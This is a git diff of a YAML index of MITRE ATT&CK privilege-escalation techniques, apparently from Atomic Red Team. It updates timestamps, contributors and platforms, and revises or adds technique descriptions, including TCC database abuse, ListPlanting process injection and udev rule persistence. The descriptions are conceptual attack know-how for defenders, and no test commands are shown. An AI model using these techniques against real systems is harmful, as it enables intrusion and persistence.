       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -25029,7 +25323,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1543.001:
@@ -25104,7 +25397,7 @@ privilege-escalation:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -25132,7 +25425,6 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests:
     - name: Launch Agent
@@ -25279,7 +25571,7 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -25322,12 +25614,10 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -25344,7 +25634,7 @@ privilege-escalation:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -25403,7 +25693,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -25485,7 +25774,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests:
     - name: rc.common
@@ -25505,7 +25793,7 @@ privilege-escalation:
         name: bash
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -25602,7 +25890,6 @@ privilege-escalation:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1543.002:
     technique:
@@ -25716,7 +26003,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1547.013:
@@ -25786,7 +26072,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.005:
     technique:
@@ -25814,7 +26099,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -25858,8 +26143,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.007:
     technique:
@@ -25895,7 +26178,7 @@ privilege-escalation:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -25914,7 +26197,6 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests:
     - name: Copy in loginwindow.plist for Re-Opened Applications
@@ -26008,7 +26290,7 @@ privilege-escalation:
         name: sh
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -26058,12 +26340,11 @@ privilege-escalation:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -26096,9 +26377,10 @@ privilege-escalation:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -26115,9 +26397,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -26163,38 +26444,19 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -26202,6 +26464,8 @@ privilege-escalation:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -26209,7 +26473,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -26239,7 +26503,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -26285,7 +26548,7 @@ privilege-escalation:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -26330,8 +26593,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1037.001:
     technique:
@@ -26357,7 +26618,7 @@ privilege-escalation:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -26383,59 +26644,28 @@ privilege-escalation:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -26452,6 +26682,9 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -26466,21 +26699,52 @@ privilege-escalation:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -26525,9 +26789,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -26584,8 +26847,8 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -26594,7 +26857,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.008:
     technique:
@@ -26636,7 +26898,7 @@ privilege-escalation:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -26661,12 +26923,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -26706,8 +26967,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -26715,13 +26978,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -26752,17 +27015,14 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -26825,7 +27085,7 @@ privilege-escalation:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -26859,8 +27119,8 @@ privilege-escalation:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -26869,6 +27129,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -26881,7 +27145,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1055.001:
@@ -26984,9 +27247,67 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
